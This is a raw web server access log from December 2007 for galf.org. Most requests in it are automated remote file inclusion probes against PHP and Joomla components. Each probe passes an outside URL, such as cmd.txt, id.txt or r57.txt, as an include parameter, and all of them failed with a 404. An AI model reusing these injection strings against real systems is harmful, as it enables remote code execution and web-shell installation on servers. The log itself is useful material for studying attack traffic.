66.162.134.131 - - [23/Dec/2007:18:51:47 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:52:12 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:52:12 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:18:52:21 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:18:52:21 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.162 - - [23/Dec/2007:18:53:59 -0800] "GET /logs/access_071119.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.32.2.242 - - [23/Dec/2007:18:54:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [23/Dec/2007:18:54:08 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.214.236 - - [23/Dec/2007:18:54:09 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:18:54:11 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:18:54:11 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:54:15 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:54:15 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:55:11 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:55:11 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.150.11.165 - - [23/Dec/2007:18:55:18 -0800] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.150.11.165 - - [23/Dec/2007:18:55:18 -0800] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:55:22 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:55:23 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.190.84 - - [23/Dec/2007:18:55:48 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.190.84 - - [23/Dec/2007:18:55:48 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.30.216.93 - - [23/Dec/2007:18:56:01 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.249.135.10 - - [23/Dec/2007:18:58:04 -0800] "GET /logs/access_071015.log/index.php?arquivo=http://slet.hraniteli.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.249.135.10 - - [23/Dec/2007:18:58:05 -0800] "GET /index.php?arquivo=http://slet.hraniteli.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.249.135.10 - - [23/Dec/2007:18:58:05 -0800] "GET /logs/index.php?arquivo=http://slet.hraniteli.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:58:15 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:58:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:58:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.197.28.59 - - [23/Dec/2007:18:58:32 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.197.28.59 - - [23/Dec/2007:18:58:32 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.216.100 - - [23/Dec/2007:18:58:39 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:59:14 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:59:30 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:18:59:30 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.176.98 - - [23/Dec/2007:18:59:43 -0800] "GET /logs/access_070716.log/contrib/mx_glance_sdesc.php?mx_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.98 - - [23/Dec/2007:18:59:44 -0800] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.98 - - [23/Dec/2007:18:59:44 -0800] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.249.135.10 - - [23/Dec/2007:18:59:45 -0800] "GET /logs/access_071029.log/index.php?arquivo=http://slet.hraniteli.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.150.11.165 - - [23/Dec/2007:19:00:10 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.150.11.165 - - [23/Dec/2007:19:00:10 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
209.97.212.250 - - [23/Dec/2007:19:00:45 -0800] "GET //]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.37.238 - - [23/Dec/2007:19:01:04 -0800] "GET /logs/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://theowns-host.we.bs/files/asc-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.238 - - [23/Dec/2007:19:01:04 -0800] "GET /postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://theowns-host.we.bs/files/asc-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.28.215 - - [23/Dec/2007:19:01:42 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.36.227.10 - - [23/Dec/2007:19:03:24 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:24 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:24 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:30 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:30 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:30 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:42 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:03:47 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:14 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:14 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:15 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:15 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:15 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:15 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:16 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:04:16 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
216.117.166.233 - - [23/Dec/2007:19:05:58 -0800] "GET //functions.php?include_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:19:05:58 -0800] "GET /logs//functions.php?include_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
208.186.169.183 - - [23/Dec/2007:19:07:22 -0800] "GET /test.php?page=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:09:02 -0800] "GET /logs/access_071105.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:09:03 -0800] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:09:03 -0800] "GET /logs//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.197.28.59 - - [23/Dec/2007:19:09:07 -0800] "GET /logs/access_071105.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:09:07 -0800] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:09:07 -0800] "GET /logs//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
59.106.19.57 - - [23/Dec/2007:19:09:38 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
59.106.19.57 - - [23/Dec/2007:19:09:38 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:09:43 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:09:44 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:09:44 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:19:10:01 -0800] "GET /logs/access_071217.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.186.169.183 - - [23/Dec/2007:19:10:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [23/Dec/2007:19:10:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:19:10:19 -0800] "GET /logs/access_070723.log/index.php?pagina=http://www.pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:19:10:19 -0800] "GET /index.php?pagina=http://www.pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:19:10:19 -0800] "GET /logs/index.php?pagina=http://www.pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:19:11:49 -0800] "GET /logs/access.log/index.php?pagina=http://www.pawang.in/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.162 - - [23/Dec/2007:19:11:50 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:12:17 -0800] "GET /logs/access_071217.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.197.28.59 - - [23/Dec/2007:19:12:17 -0800] "GET /logs/access_071217.log//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.131.106.16 - - [23/Dec/2007:19:14:29 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
59.106.19.57 - - [23/Dec/2007:19:15:31 -0800] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
59.106.19.57 - - [23/Dec/2007:19:15:31 -0800] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:16:09 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:16:09 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.97.212.250 - - [23/Dec/2007:19:16:22 -0800] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
38.99.13.122 - - [23/Dec/2007:19:16:33 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "galf.org"
202.181.99.12 - - [23/Dec/2007:19:16:58 -0800] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
202.181.99.12 - - [23/Dec/2007:19:16:59 -0800] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:19:17:05 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:19:17:05 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:19:19:52 -0800] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:19:21:06 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.191.50.159 - - [23/Dec/2007:19:21:06 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:19:21:09 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.50.159 - - [23/Dec/2007:19:21:09 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.226.157 - - [23/Dec/2007:19:22:06 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:22:25 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.197.182 - - [23/Dec/2007:19:22:26 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://armageddon0683.zoomshare.com/files/file_injek/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:19:23:16 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:19:23:16 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:19:23:17 -0800] "GET /logs/access_070723.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.131 - - [23/Dec/2007:19:23:17 -0800] "GET /logs/access.log//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.115.63 - - [23/Dec/2007:19:23:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)"
72.36.115.63 - - [23/Dec/2007:19:23:20 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 262144 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)"
208.186.169.183 - - [23/Dec/2007:19:24:12 -0800] "GET /logs/access_071014.log/test.php?page=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
